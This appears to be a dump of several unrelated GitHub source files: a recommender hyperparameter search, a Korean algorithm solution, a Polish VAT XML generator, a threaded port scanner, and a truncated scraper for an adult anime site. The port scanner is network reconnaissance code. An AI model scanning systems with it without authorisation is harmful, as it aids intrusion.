n_clusters=n_clusters)\n\n evaluator = RecommenderEvaluator(column_attribute, predictor, row_attribute, evaluator_target)\n validator = KFoldValidator(df, evaluator, predictor, n_folds=2)\n score, std_error = validator.validate()\n\n scores.append(score)\n errors.append(std_error)\n\n plot_between(cluster_sizes, scores, errors)\n \n plt.xlabel(\"N clusters\")\n plt.ylabel(\"Score\")\n plt.title(\"N cluster research\")\n\n plt.savefig(\"figures/hyper/n_clusters.png\")\n\n if show:\n plt.show()\n else:\n plt.close()\n\n best_score_index = scores.index(max(scores))\n best_n_clusters = cluster_sizes[best_score_index]\n best_score = scores[best_score_index]\n best_error = errors[best_score_index]\n\n logger.info(f\"Best N clusters: {best_n_clusters}. 
Score {best_score} +- {best_error}\")\n return best_n_clusters\n\n \ndef optimize_n_svd_dimensions(df, predictor_target, evaluator_target, row_attribute, column_attribute, similarity_attributes, similarity_weights, n_clusters, show=False):\n\n svd_dimension_values = range(1, n_clusters)\n scores, errors = [], []\n for n_svd_dimensions in svd_dimension_values:\n logger.setLevel(logging.PROGRESS)\n logger.progress(f\"Current SVD dimensions {n_svd_dimensions}\")\n logger.setLevel(logging.INFO)\n\n predictor = SVDPredictor(predictor_target, row_attribute, column_attribute, \n row_similarity_attributes=similarity_attributes,\n row_similarity_weights=similarity_weights,\n n_clusters=n_clusters,\n n_svd_dimensions=n_svd_dimensions)\n\n evaluator = RecommenderEvaluator(column_attribute, predictor, row_attribute, evaluator_target)\n validator = KFoldValidator(df, evaluator, predictor, n_folds=2)\n score, std_error = validator.validate()\n\n scores.append(score)\n errors.append(std_error)\n\n plot_between(svd_dimension_values, scores, errors)\n \n plt.xlabel(\"N SVD dimensions\")\n plt.ylabel(\"Score\")\n plt.title(\"SVD research\")\n\n plt.savefig(\"figures/hyper/n_svd_dimensions.png\")\n \n if show:\n plt.show()\n else:\n plt.close()\n\n best_score_index = scores.index(max(scores))\n best_n_svd_dimensions = svd_dimension_values[best_score_index]\n best_score = scores[best_score_index]\n best_error = errors[best_score_index]\n \n logger.info(f\"Best N SVD dimensions {best_n_svd_dimensions}. Score {best_score} +- {best_error}\")\n return best_n_svd_dimensions\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Nickvs99/DataMining","sub_path":"Assignment 2/hyper_parameter_svd.py","file_name":"hyper_parameter_svd.py","file_ext":"py","file_size_in_byte":8696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70383699892","text":"from collections import deque\r\nimport heapq\r\n\r\ntime = 0\r\nsize = 2\r\neaten_fish_num = 0\r\n\r\nn = int(input())\r\nspace = [list(map(int, input().split())) for i in range(n)]\r\n\r\nfor y in range(n):\r\n for x in range(n):\r\n if space[y][x] == 9:\r\n start = (0, y, x)\r\n\r\ndef find_min(start, space, size):\r\n dirs = [(0, 1), (0, -1), (-1, 0), (1, 0)]\r\n queue = deque()\r\n queue.append(start)\r\n\r\n cnt, y, x = start # cnt = 다음 물고기를 먹는데 걸리는 시간 = 거리\r\n # 시작하는 위치의 값을 0으로 바꾸기\r\n space[y][x] = 0\r\n min_dist = [] # (cnt, y, x) 형태로 저장할 heapq\r\n visited = set()\r\n\r\n while queue:\r\n cnt, y, x = queue.popleft()\r\n visited.add((y, x))\r\n for dy, dx in dirs:\r\n ny, nx = y + dy, x + dx\r\n if 0 <= ny < n and 0 <= nx < n and (ny, nx) not in visited: # 공간의 범위 내에 있고 아직 방문하지 않았으면\r\n visited.add((ny, nx)) \r\n if space[ny][nx] == size or space[ny][nx] == 0: # 같은 크기의 물고기가 있거나 빈칸인 경우\r\n queue.append((cnt + 1, ny, nx))\r\n continue\r\n if space[ny][nx] > size: # 큰 물고기가 있으면 \r\n continue\r\n else: # 작은 크기의 물고기가 있으면\r\n heapq.heappush(min_dist, (cnt + 1, ny, nx))\r\n \r\n # 먹을 수 있는 가장 가까운 물고기 까지의 거리 정보\r\n if min_dist:\r\n return min_dist[0]\r\n else:\r\n return None # 식용 가능 물고기 x\r\n\r\nwhile True:\r\n next_dist = find_min(start, space, size)\r\n\r\n if next_dist is None:\r\n break\r\n cnt, y, x = next_dist\r\n time += cnt\r\n # 물고기 먹은 수와 상어의 크기 관계\r\n eaten_fish_num += 1\r\n if eaten_fish_num == size:\r\n eaten_fish_num = 0 # 초기화\r\n size += 1 # 크기 증가\r\n \r\n # 출발점 변경\r\n start = (0, y, x)\r\n\r\nprint(time)","repo_name":"armyants531/baejoon","sub_path":"백준/Gold/16236. 
아기 상어/아기 상어.py","file_name":"아기 상어.py","file_ext":"py","file_size_in_byte":2025,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"23387452281","text":"#!/usr/bin/env python\n# -*- coding: windows-1250 -*-\n\nfrom pprint import pprint\nfrom lxml import etree as et\nfrom decimal import Decimal\nfrom os.path import abspath\nfrom tkinter import filedialog\nfrom tkinter import messagebox\nfrom tkinter import *\nfrom calendar import monthrange\n\nimport csv\nimport configparser\nimport os\nimport codecs\nimport time\nimport datetime\n\n#TODO obsługa headerów w cfg\n\n__location__ = os.path.realpath(\n os.path.join(os.getcwd(), os.path.dirname(__file__)))\n\n\ndef mkWiersz(index, val, stawka):\n global root\n\n tns_ns = 'http://jpk.mf.gov.pl/wzor/2017/11/13/1113/'\n etd_ns = 'http://crd.gov.pl/xml/schematy/dziedzinowe/mf/2016/01/25/eD/DefinicjeTypy/'\n\n SprzedazWiersz = et.SubElement(root, et.QName(tns_ns, 'SprzedazWiersz'))\n\n LpSprzedazy = et.SubElement(SprzedazWiersz, et.QName(tns_ns, 'LpSprzedazy'))\n LpSprzedazy.text = str(index)\n\n NrKontrahenta = et.SubElement(SprzedazWiersz, et.QName(tns_ns, 'NrKontrahenta'))\n if len(val['NIP']) > 0:\n NrKontrahenta.text = val['NIP']\n else:\n NrKontrahenta.text = \"brak\"\n\n NazwaKontrahenta = et.SubElement(SprzedazWiersz, et.QName(tns_ns, 'NazwaKontrahenta'))\n NazwaKontrahenta.text = val['Klient']\n\n AdresKontrahenta = et.SubElement(SprzedazWiersz, et.QName(tns_ns, 'AdresKontrahenta'))\n AdresKontrahenta.text = val['Adres']\n\n DowodSprzedazy = et.SubElement(SprzedazWiersz, et.QName(tns_ns, 'DowodSprzedazy'))\n DowodSprzedazy.text = val['Numer faktury']\n\n DataWystawienia = et.SubElement(SprzedazWiersz, et.QName(tns_ns, 'DataWystawienia'))\n date = val['Data wystawienia'].split(' ')\n DataWystawienia.text = date[0]\n\n DataSprzedazy = et.SubElement(SprzedazWiersz, et.QName(tns_ns, 'DataSprzedazy'))\n date = val['Data sprzedaży'].split(' ')\n DataSprzedazy.text = date[0]\n\n if stawka == 23:\n K_19 = et.SubElement(SprzedazWiersz, et.QName(tns_ns, 'K_19'))\n K_19.text = val['Netto 23%'].replace(',', '.')\n\n K_20 = et.SubElement(SprzedazWiersz, et.QName(tns_ns, 'K_20'))\n K_20.text = val['VAT 23%'].replace(',', '.')\n\n if stawka == 8:\n K_17 = et.SubElement(SprzedazWiersz, et.QName(tns_ns, 'K_17'))\n K_17.text = val['Netto 8%'].replace(',', '.')\n\n K_18 = et.SubElement(SprzedazWiersz, et.QName(tns_ns, 'K_18'))\n K_18.text = val['VAT 8%'].replace(',', '.')\n\n\ndef mkheader(datex):\n global settings\n global root\n datex = datex.split('-')\n dateRange = monthrange(int(datex[0]), int(datex[1]))\n pprint(datex)\n pprint(dateRange)\n\n tns_ns = 'http://jpk.mf.gov.pl/wzor/2017/11/13/1113/'\n Naglowek = et.SubElement(root, et.QName(tns_ns, 'Naglowek'))\n\n KodFormularza = et.SubElement(Naglowek, et.QName(tns_ns, 'KodFormularza'))\n KodFormularza.text = 'JPK_VAT'\n KodFormularza.set('wersjaSchemy', '1-1')\n KodFormularza.set('kodSystemowy', 'JPK_VAT (3)')\n\n WariantFormularza = et.SubElement(Naglowek, et.QName(tns_ns, 'WariantFormularza'))\n WariantFormularza.text = '3'\n\n CelZlozenia = et.SubElement(Naglowek, et.QName(tns_ns, 'CelZlozenia'))\n CelZlozenia.text = settings.get('naglowek', 'celzlozenia')\n\n DataWytworzeniaJPK = et.SubElement(Naglowek, et.QName(tns_ns, 'DataWytworzeniaJPK'))\n DataWytworzeniaJPK.text = str(datetime.datetime.utcnow()).replace(' ', 'T') #yep, work around\n\n DataOd = et.SubElement(Naglowek, et.QName(tns_ns, 'DataOd'))\n DataOd.text = 
datetime.date(int(datex[0]), int(datex[1]), 1).strftime('%Y-%m-%d')\n\n DataDo = et.SubElement(Naglowek, et.QName(tns_ns, 'DataDo'))\n DataDo.text = datetime.date(int(datex[0]), int(datex[1]), dateRange[1]).strftime('%Y-%m-%d')\n\n NazwaSystemu = et.SubElement(Naglowek, et.QName(tns_ns, 'NazwaSystemu'))\n NazwaSystemu.text = settings.get('naglowek', 'nazwasystemu')\n\ndef mkpodmiot():\n tns_ns = 'http://jpk.mf.gov.pl/wzor/2017/11/13/1113/'\n Podmiot = et.SubElement(root, et.QName(tns_ns, 'Podmiot1'))\n\n NIP = et.SubElement(Podmiot, et.QName(tns_ns, 'NIP'))\n NIP.text = settings.get('podmiot', 'nip')\n\n PelnaNazwa = et.SubElement(Podmiot, et.QName(tns_ns, 'PelnaNazwa'))\n PelnaNazwa.text = settings.get('podmiot', 'pelna_nazwa')\n\n Email = et.SubElement(Podmiot, et.QName(tns_ns, 'Email'))\n Email.text = settings.get('podmiot', 'email')\n\n\n\ndef run():\n rows = [] # wszystkie rekordy z .csv\n podatek = Decimal() # suma całego należnego podatku\n global gui\n global root\n csvFilename = gui.csvFilename.get()\n\n try:\n with open(csvFilename, 'r', encoding='windows-1250') as csvfile:\n reader = csv.DictReader(csvfile, delimiter=';')\n for row in reader:\n rows.append(row)\n except Exception as e:\n messagebox.showerror('Błąd', e)\n return -1\n\n et.register_namespace('tns', 'http://jpk.mf.gov.pl/wzor/2017/11/13/1113/')\n et.register_namespace('etd', 'http://crd.gov.pl/xml/schematy/dziedzinowe/mf/2016/01/25/eD/DefinicjeTypy/')\n\n tns_ns = 'http://jpk.mf.gov.pl/wzor/2017/11/13/1113/'\n etd_ns = 'http://crd.gov.pl/xml/schematy/dziedzinowe/mf/2016/01/25/eD/DefinicjeTypy/'\n\n namespaces = {\n 'tns': tns_ns,\n 'etd': etd_ns\n }\n\n root = et.Element(\"{http://jpk.mf.gov.pl/wzor/2017/11/13/1113/}JPK\", nsmap=namespaces)\n mkheader(rows[1]['Data wystawienia'].split(' ')[0])\n mkpodmiot()\n\n index = 0\n for key, val in enumerate(rows):\n if val['Netto 23%'] != '0,00':\n index += 1\n mkWiersz(index, val, 23)\n\n if val['Netto 8%'] != '0,00':\n index += 1\n mkWiersz(index, val, 8)\n\n podatek += Decimal(val['Netto 8%'].replace(',', '.'))\n podatek += Decimal(val['Netto 23%'].replace(',', '.'))\n\n SprzedazCtrl = et.SubElement(root, et.QName(tns_ns, 'SprzedazCtrl'))\n LiczbaWierszySprzedazy = et.SubElement(SprzedazCtrl, et.QName(tns_ns, 'LiczbaWierszySprzedazy'))\n # LiczbaWierszySprzedazy.text = str(len(rows))\n LiczbaWierszySprzedazy.text = str(index)\n PodatekNalezny = et.SubElement(SprzedazCtrl, et.QName(tns_ns, 'PodatekNalezny'))\n PodatekNalezny.text = str(podatek)\n\n tree = et.ElementTree(root)\n # tree.write('jpk 0618.xml', pretty_print=True)\n # tree.write('jpk 0618.xml', pretty_print=True, encoding='cp1250')\n tree.write('jpk.xml', pretty_print=True, encoding='UTF-8')\n\n messagebox.showinfo('Gotowe', 'Skrypt zakończył działanie, sprawdź poprawność pliku')\n\n\ndef browseCsv():\n global gui\n global settings, cfgfile\n\n path = settings.get('gui', 'lastpath')\n gui.csvFilename.set(filedialog.askopenfilename(initialdir=path, title=\"Select file\",\n filetypes=((\"csv files\", \"*.csv\"), (\"all files\", \"*.*\"))))\n\n path = os.sep.join(gui.csvFilename.get().split(os.sep)[0:-1])\n settings.set('gui', 'lastpath', path)\n savecfg()\n\n txt = gui.csvFilename.get().split(os.sep)\n CsvLabel.configure(text=txt[-1])\n\n\ndef savecfg():\n global settings\n with open(os.path.join(__location__, 'settings.ini'), 'w') as cfgfile:\n 
settings.write(cfgfile)\n\n\nif __name__ == '__main__':\n gui = Tk()\n gui.title('PyJPK3')\n gui.csvFilename = StringVar()\n # gui.grid_columnconfigure(2, weight=1)\n\n # with open(os.path.join(__location__, 'settings.ini'), 'w') as cfgfile:\n settings = configparser.ConfigParser()\n # settings._interpolation = configparser.ExtendedInterpolation()\n settings.read(os.path.join(__location__, 'settings.ini'))\n\n gui.minsize(300, 200)\n\n CsvLabel = Label(gui, text=gui.csvFilename.get())\n CsvLabel.grid(row=0, column=1, sticky=E)\n\n loadCsv = Button(gui, text=\"Wczytaj plik CSV\", command=browseCsv)\n loadCsv.grid(row=0, column=0, sticky=W)\n\n startBtn = Button(gui, text=\"Start\", command=run)\n startBtn.grid(row=3, column=0, sticky=W)\n\n # try:\n # config = configparser.ConfigParser()\n # config.read_file(codecs.open(abspath('pyjpk.cfg'), encoding='windows-1250'))\n # except Exception as e:\n # messagebox.showinfo(\"Błąd\", e)\n\n mainloop()\n","repo_name":"d0nth4x/py-jpk-3","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8225,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19072738012","text":"# rebuild port_scanner.py\nimport socket\nimport threading\nimport sys\nfrom datetime import datetime\nimport platform\nimport subprocess\nfrom subprocess import PIPE, Popen\nimport banner as banner\n\n\ndef connect(ip, port, output):\n\t# create socket object\n\tobj = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n\tsocket.setdefaulttimeout(2)\n\ttry:\n\t\tobj.connect((ip, port))\n\t\toutput[port] = 'Open'\n\texcept:\n\t\toutput[port] = ''\n\n\n\ndef scan(host):\n\tthreads = [] # run connect() simultaneously\n\toutput = {}\t # for printing the output\n\n\ttime1 = datetime.now()\n\n\ttry:\n\t\t# create threads\n\t\tfor i in range(main.MAX_ports):\n\t\t\tt = threading.Thread(target=connect, args=(host, i, output))\n\t\t\tthreads.append(t)\n\t\n\t\t# start threads\n\t\tfor i in range(main.MAX_ports):\n\t\t\tthreads[i].start()\n\n\t\t# lock main thread until all threads finish\n\t\tfor i in range(main.MAX_ports):\n\t\t\tthreads[i].join()\n\n\t\tfor i in range(main.MAX_ports):\n\t\t\tif output[i] == 'Open':\n\t\t\t\ttry: # get the service name\n\t\t\t\t\tserv = socket.getservbyport(i)\n\t\t\t\texcept socket.error:\n\t\t\t\t\tserv = 'none'\n\t\t\t\tprint('[Hit] ' + host + ':' + str(i) + ' = ' \n\t\t\t\t\t+ output[i] + ' [*] SERVICE: ' + serv)\n\n\texcept KeyboardInterrupt:\n\t\tprint(\"\\n[Ign] Keyboard Interrupt -- Exiting...\")\n\t\tsys.exit()\n\texcept socket.gaierror:\n\t\tprint(\"\\n[Err] Hostname could not be resolved...\")\n\t\tsys.exit()\n\texcept socket.error:\n\t\tprint(\"\\n [Err] Server could not be reached...\")\n\t\tsys.exit()\n\t# How long it took to scan\n\ttime2 = datetime.now()\n\ttime_taken = time2 - time1\n\tprint(f\"[*] Time taken: {time_taken}\")\n\ndef main(ip):\n    while True:\n        # Clear the screen\n        if platform.system() == \"Windows\":\n            subprocess.call('cls', shell=True)\n            main.MAX_ports = 1000\n        else:\n            subprocess.call('clear', shell=True)\n\n        # check the limit of open file descriptors\n        command = \"ulimit -n\"\n        with Popen(command, stdout=PIPE, stderr=None, shell=True) as process:\n            # store in a constant\n            max_ports = int(process.communicate()[0].decode(\"utf-8\"))\n            main.MAX_ports = max_ports - 100\n    \n        # DNS\n        host = socket.gethostbyname(ip)\n        banner.head()\n        print(f'''\n[*] Scanning: {host}\n[*] # of ports to scan: {main.MAX_ports}\n[*] Please wait...\n''')\n        scan(host)\n        
break\nif __name__ == \"__main__\":\n    try:\n        ip = sys.argv[1]\n        main(ip)\n    except IndexError:\n        banner.usage()\n","repo_name":"prodseanb/portRecon","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2455,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"23621460678","text":"import re\nimport requests\nimport json\nfrom bs4 import BeautifulSoup\nfrom flask_restful import reqparse\nfrom flask import Blueprint, send_from_directory\nfrom requests.utils import requote_uri\nfrom config import ApiPath, UPLOAD_FOLDER\nfrom utils.lru_cache import timed_lru_cache\nfrom utils.messages import messages\nfrom settings import headers\nfrom utils.plyr import PlyrSource\n\nModuleTitle = \"Hentaiz\"\nModuleid = 'hentaiz'\nModulePath = Moduleid+'/'\nHentaizLink = 'https://hentaiz.org/'\nhentai = True\nModule = Blueprint(ModulePath, __name__)\n@Module.route(ApiPath+ModulePath, methods = ['post'])\ndef Page():\n\tparser = reqparse.RequestParser()\n\tparser.add_argument(\"page\")\n\tparams = parser.parse_args()\n\tdata = GetPage(params.get('page'))\n\tif data.get('status')!=200:\n\t\treturn data, data.get('status')\n\treturn json.dumps(data), data.get('status')\n@Module.route(ApiPath+ModulePath+'genres', methods = ['post', 'get'])\ndef GenresRequest():\n\tdata = GetGenres()\n\tif not data:\n\t\treturn {\n\t\t\t'status': 404,\n\t\t\t'message': messages.get('not_response'),\n\t\t}\n\treturn json.dumps({'data': data, 'status': 200})\n@Module.route(ApiPath+ModulePath+'title', methods = ['post'])\ndef TitleRequest():\n\tparser = reqparse.RequestParser()\n\tparser.add_argument(\"id\")\n\tparams = parser.parse_args()\n\tid = params.get('id')\n\tif not id:\n\t\treturn {\"message\":messages['no_param'].format('id'),'status': 400}\n\ttitle = GetTitleById(id)\n\treturn title, title.get('status')\n@Module.route(ApiPath+ModulePath+'video/<prelink>/<videoid>')\ndef GetVideo(videoid,prelink):\n\tdata = GetVideoById(videoid,prelink)\n\tout = {\n\t\t'status': data.get('status'),\n\t}\n\tif data.get('status')==200:\n\t\tout['data'] = data.get('data')\n\telse:\n\t\tout['message'] = data.get('message')\n\treturn out, data.get('status')\n@Module.route(ApiPath+ModulePath+'genre', methods = ['post'])\ndef GenreRequest():\n\tparser = reqparse.RequestParser()\n\tparser.add_argument(\"genre\")\n\tparser.add_argument(\"page\")\n\tparams = parser.parse_args()\n\tgenre = params.get('genre')\n\tif not genre:\n\t\treturn \"Не передан параметр genre\", 400\n\tgenre = requote_uri(genre)\n\tgenres = GetGenres()\n\tfor key, val in genres.items():\n\t\tfor item in val['links']:\n\t\t\tif item[1].lower()==genre.lower():\n\t\t\t\tgenre_data = GetGenre(val.get('prelink')+\"/\"+item[1], params.get('page'))\n\t\t\t\tif genre_data.get('data'):\n\t\t\t\t\tgenre_data['data']['genre_name']=item[0].title()\n\t\t\t\treturn genre_data, genre_data.get('status')\n\tif genre.isdigit() and len(genre)==4:\n\t\tgenre_data = GetGenre(\"xfsearch/\"+genre+\"+год\", params.get('page'))\n\t\tif genre_data.get('status')!=200:\n\t\t\tgenre_data['message'] = 'Жанр не найден'\n\t\tif genre_data.get('data'):\n\t\t\tgenre_data['data']['genre_name']=genre\n\t\treturn genre_data, genre_data.get('status')\n\treturn {'message': 'Жанр не найден', 'status': 404}, 404\n@Module.route(ApiPath+ModulePath+'icon')\ndef icon():\n\treturn send_from_directory(UPLOAD_FOLDER, 'hentaiz.png')\n@Module.route(ApiPath+ModulePath+'search', methods = ['post'])\ndef SearchRequest():\n\tparser = 
reqparse.RequestParser()\n\tparser.add_argument(\"name\")\n\tparser.add_argument(\"page\")\n\tparams = parser.parse_args()\n\tname = params.get('name')\n\tpage = params.get('page')\n\tif page and not page.isdigit():\n\t\treturn \"Некорректная страница\", 404\n\tif not name:\n\t\treturn \"Не передан параметр name\", 400\n\treturn search(name, page)\n@timed_lru_cache(60*60)\ndef search(name, page):\n\tresponse = requests.post(HentaizLink+'index.php?do=search',params={'story':name, 'result_from': 1, 'full_search': 0, 'search_start': page or 1, 'subaction':'search', 'do': 'search'}, headers=headers)\n\tif response:\n\t\treturn GetTitles('', response.text)\n@timed_lru_cache(60*5)\ndef GetVideoById(videoid, prelink):\n\tsession = requests.Session()\n\tplayer_url = f'https://hentaiz.xyz/hub/{prelink}/list{prelink[0]}.php?id='+videoid\n\tresponse = session.get(player_url)\n\t# with open('video.html', \"w\", encoding=\"utf-8\") as f:\n\t# \tf.write(response.text)\n\t# \tf.close()\n\tif not response:\n\t\treturn {\n\t\t\t'status': response.status_code,\n\t\t\t'message': 'Ответ сервера не получен'\n\t\t}\n\tresponse = session.get(f'https://hentaiz.xyz/hub/{prelink}/fembed.php?id='+videoid, headers={'Referer': player_url})\n\tif response:\n\t\tp = next(re.finditer(r\"playerInstance\\.setup\\([\\s\\S]*?file: '(.*?)'[\\s\\S]*?image: '(.*?)'\", response.text), None)\n\t\tif not p:\n\t\t\treturn {\n\t\t\t\t'status': 404,\n\t\t\t\t'message': 'Ошибка получения ссылки',\n\t\t\t}\n\t\treturn {\n\t\t\t'status': 200,\n\t\t\t'data': PlyrSource(p.group(1),p.group(2))\n\t\t}\n\telse:\n\t\treturn {\n\t\t\t'status': 404,\n\t\t\t'message': messages.get('not_response'),\n\t\t}\n@timed_lru_cache(60*10)\ndef GetGenre(GenreUrl, page=None):\n\tUrl = HentaizLink+GenreUrl\n\tif page is not None:\n\t\tif not page.isdigit():\n\t\t\treturn {\"message\": messages['error_page_number'], 'status': 400}\n\t\tUrl+=f'/page/{page}/'\n\treturn GetTitles(Url)\n@timed_lru_cache(60*60*6)\ndef GetGenres():\n\tgenres = requests.get(HentaizLink+'tags/', headers=headers)\n\tyears = requests.get(HentaizLink+'years.html', headers=headers)\n\tgenres.encoding = 'utf8'\n\tyears.encoding = 'utf8'\n\tif years and genres:\n\t\tsoup_genres = BeautifulSoup(genres.text, 'lxml')\n\t\tsoup_years = BeautifulSoup(years.text, 'lxml')\n\t\tdata_genres = soup_genres.select('#dle-content')\n\t\tif not data_genres or not soup_years:\n\t\t\treturn {\n\t\t\t\t'status': 500,\n\t\t\t\t'message': 'Ошибка'\n\t\t\t}\n\t\ttags = data_genres[0].select('.clearfix.cloud-tags > span > a')\n\t\tyears = soup_years.select('.static-year-content > ul > a')\n\t\tcategory = soup_genres.select('.m-menu.to-mob.clearfix > li > a')\n\t\tif not tags or not years:\n\t\t\treturn \n\t\treturn {\n\t\t\t'category': {\n\t\t\t\t'links': [[i.text,i.get('href').split('/')[1]] for i in category if not i.get('class')][1:-1],\n\t\t\t\t'prelink': '',\n\t\t\t\t'name': 'Категория',\n\t\t\t},\n\t\t\t'genres': {\n\t\t\t\t'links': [[i.text, i.get('href').split('/')[-2]] for i in tags],\n\t\t\t\t'prelink': 'tags',\n\t\t\t\t'name': 'Жанр',\n\t\t\t},\n\t\t\t'years': {\n\t\t\t\t'links': [[i.text, i.get('href').split('/')[1]] for i in years],\n\t\t\t\t'prelink': '',\n\t\t\t\t'name': 'Год',\n\t\t\t},\n\t\t}\n\n@timed_lru_cache(60*10)\ndef GetPage(page):\n\tif page and not page.isdigit():\n\t\treturn {\n\t\t\t'status': 400,\n\t\t\t'message': messages.get('error_page_number'),\n\t\t}\n\treturn GetTitles(HentaizLink+(f'page/{page}' if page else ''))\ndef GetTitles(Url, html=None):\n\tif not html:\n\t\tresponse = 
requests.get(Url, headers=headers)\n\t\tresponse.encoding = 'utf8'\n\tif html or response:\n\t\tsoup = BeautifulSoup(response.text if not html else html, 'lxml')\n\t\tdata = soup.select('#dle-content')\n\t\tif not data:\n\t\t\treturn {\n\t\t\t\t'status': 500,\n\t\t\t\t'message': 'Ошибка'\n\t\t\t}\n\t\tdata = data[0]\n\t\toutdata = list()\n\t\ttitles = data.select('article.short.clearfix')\n\t\tif not titles:\n\t\t\treturn {\n\t\t\t\t'status': 404,\n\t\t\t\t'message': messages.get(404),\n\t\t\t}\n\t\tfor title in titles:\n\t\t\timgbox = title.select('a.short-poster.img-box')\n\t\t\timg = imgbox[0].select('img')[0].get('src')\n\t\t\ttitle_info = {\n\t\t\t\t'ru_title': title.select('.sh-title')[0].text,\n\t\t\t\t#en_title нет\n\t\t\t\t'id': title.select('.sh-desc > a')[0].get('href').split('/')[-1].split('.')[0],\n\t\t\t\t'poster': img if img.startswith('//') else HentaizLink[:-1]+img,\n\t\t\t\t'announce': bool(imgbox[0].select('.announce .announce-new')),\n\t\t\t\t'ongoing': bool(imgbox[0].select('.announce .announce-ongoing')),\n\t\t\t\t\n\t\t\t}\n\t\t\tinfo_blocks = list()\n\t\t\tfor i in imgbox[0].select('.short-meta.short-label'):\n\t\t\t\tif not i.text:\n\t\t\t\t\tcontinue\n\t\t\t\tif 'sl-y' in i.get('class'):\n\t\t\t\t\ttitle_info['series'] = i.text\n\t\t\t\telse:\n\t\t\t\t\tinfo_blocks.append(i.text)\n\t\t\tif info_blocks:\n\t\t\t\ttitle_info['info_blocks'] = info_blocks\n\t\t\t# info_blocks = [i.text if i.text]\n\t\t\t\n\t\t\t# orgtitle = title.select('.sh-orgtitle')\n\t\t\t# if orgtitle:\n\t\t\t# \tyear = orgtitle[0].text\n\t\t\t# \tif year[0]=='(' and year[-1]==')':\n\t\t\t# \t\ttitle_info['year'] = year[1:-1] # может быть несколько лет через тире по этому не int\n\t\t\t# \tif len(orgtitle)>1:\n\t\t\t# \t\ttitle_info['genre'] = [i.text for i in orgtitle[1].select('a')]\n\t\t# \tth_in = title.select('.th-in')\n\t\t# \tposter = th_in[0].select('.th-img > img')[0].get('data-src')\n\t\t# \ttitle_info = {\n\t\t# \t\t'poster': (poster if 'http' in poster else AnidubMirrorLink()+poster),\n\t\t# \t\t'id': LinkSplitter.join(th_in[0].get('href').split('/')[3:]).split('.')[0],#на конце кажой ссылки есть .html\n\t\t# \t}\n\t\t# \tru_title = th_in[1].select('.th-title')\n\t\t# \tif ru_title:\n\t\t# \t\tru_title_content = ru_title[0].text.split('[')\n\t\t# \t\tif len(ru_title_content)>1:\n\t\t# \t\t\ttitle_info['series'] = ru_title_content[-1][:-1]\n\t\t# \t\ttitle_info['ru_title'] = ' '.join(ru_title_content[0].split())\n\t\t# \ten_title = th_in[1].select('.th-subtitle')\n\t\t# \tif en_title:\n\t\t# \t\ttitle_info['en_title'] = ' '.join(en_title[0].text.split())\n\t\t\toutdata.append(title_info)\n\t\tpages = data.select('.navigation *')\n\t\treturn {\n\t\t\t'status': 200,\n\t\t\t'data': {\n\t\t\t\t'data': outdata,\n\t\t\t\t'horny': hentai,\n\t\t\t\t'pages': int(pages[-1].text) if pages else 1,\n\t\t\t\t'service_title': ModuleTitle,\n\t\t\t},\n\t\t}\n\telse:\n\t\treturn {\n\t\t\t'status': response.status_code if not html else 404,\n\t\t\t'message': messages.get('not_response'),\n\t\t}\n@timed_lru_cache(60*60)\ndef GetTitleById(title_id):\n\tresponse = requests.get(HentaizLink+title_id+'.html', headers=headers)\n\tresponse.encoding = 'utf8'\n\tif response:\n\t\t# with open('title.html', \"w\", encoding=\"utf-8\") as f:\n\t\t# \tf.write(response.text)\n\t\t# \tf.close()\n\t\tsoup = BeautifulSoup(response.text, 'lxml')\n\n\t\tdle_content = soup.select('#dle-content')\n\t\tif not dle_content:\n\t\t\treturn {\n\t\t\t\t'status': 500,\n\t\t\t\t'message': messages.get('error_parce')\n\t\t\t}\n\t\tout = 
{}\n\t\ttitle = soup.find(\"meta\", property=\"og:title\")\n\t\tif title:\n\t\t\tout['ru_title'] = title.get('content')\n\t\telse:\n\t\t\ttitle = dle_content[0].select('.fmain > .fheader > h1')\n\t\t\tif title:\n\t\t\t\tout['ru_title'] = title[0].text\n\t\tposter = dle_content[0].select('.fposter > img')\n\t\tif poster:\n\t\t\tout['poster'] = HentaizLink[:-1]+poster[0].get('src').replace('\\n', '')\n\t\tdescription = dle_content[0].select('#fdesc')\n\t\tif description:\n\t\t\tout['description'] = description[0].text\n\t\tseries = dle_content[0].select('.tab_content > .tabs > .series-btn > .s-link')\n\t\tout['series'] = {}\n\t\tif series:\n\t\t\tout_series = list()\n\t\t\tfor i in series:\n\t\t\t\tif 'vip.php' not in i.get('data-src'):\n\t\t\t\t\tlink = i.get('data-src').split('/')\n\t\t\t\t\tif 'hub' in link:\n\t\t\t\t\t\tout_series.append({\n\t\t\t\t\t\t\t'link':\"/\"+ModulePath+'video/'+link[link.index('hub')+1]+\"/\"+i.get('data-src').split('id=')[1],\n\t\t\t\t\t\t\t'name': i.text,\n\t\t\t\t\t\t})\n\t\t\tif out_series:\n\t\t\t\tout['series']['data'] = out_series\n\t\t\t\tfirst_splited_link = out_series[0]['link'].split('/')\n\t\t\t\tfirst = GetVideoById(first_splited_link[-1],first_splited_link[-2])\n\t\t\t\tif first.get('status')==200:\n\t\t\t\t\tfirst_data = first.get('data')\n\t\t\t\t\t\n\t\t\t\t\tfirst_data['name'] = out_series[0]['name']\n\t\t\t\t\tout['series']['data'][0] = first_data\n\t\t\t\tout['series']['direct_link']=False\n\t\telse:\n\t\t\tseries = dle_content[0].select('.embed-responsive > iframe')\n\t\t\tif series:\n\t\t\t\tsplited_link = series[0].get('src').split('/')\n\t\t\t\tepisode = GetVideoById(splited_link[-1].split('=')[-1],splited_link[-2])\n\t\t\t\tif episode.get('status')==200:\n\t\t\t\t\tepisode_data = episode.get('data')\n\t\t\t\t\tepisode_data['name'] = 'Видео'\n\t\t\t\t\tout['series']['data'] = [episode_data]\n\t\t\t\tout['series']['direct_link']=False\n\t\tfmright = dle_content[0].select('.fmright')\n\t\tif fmright:\n\t\t\tblocks = list()\n\t\t\tfor items_container in fmright[0].select('.flist > .flist-col > .vis'):\n\t\t\t\titems = items_container.select('* > 